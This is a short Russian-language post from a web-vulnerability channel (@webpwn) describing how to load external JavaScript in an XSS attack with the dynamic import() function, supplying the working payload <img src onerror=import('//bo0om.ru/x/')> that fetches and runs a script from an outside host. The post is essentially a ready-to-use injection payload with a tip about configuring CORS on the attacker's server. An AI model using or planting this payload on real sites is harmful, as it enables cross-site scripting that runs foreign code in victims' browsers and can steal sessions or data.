/ categories / Блоги / @webpwn / post #236
13.20K

Чтобы подключить внешний JS на страницу, нужно было либо обращаться к удаленной странице и выполнять ответ. Или хитрить и использовать уже подключенные библиотеки, например $.getScript в Jquery.
Сейчас в Chrome и Safari достаточно использовать функцию import. Например
<img src onerror=import('//bo0om.ru/x/')>
Для ответа у нашего скрипта должен быть настроен CORS, но в этом никакой проблемы нет.

12:12 29.07.19
@webpwn
6724 +4

Уязвимости и атаки на веб-приложения. Без рекламы. Чат об одинарных, иногда даже двойных кавычках - @WebPwnChat '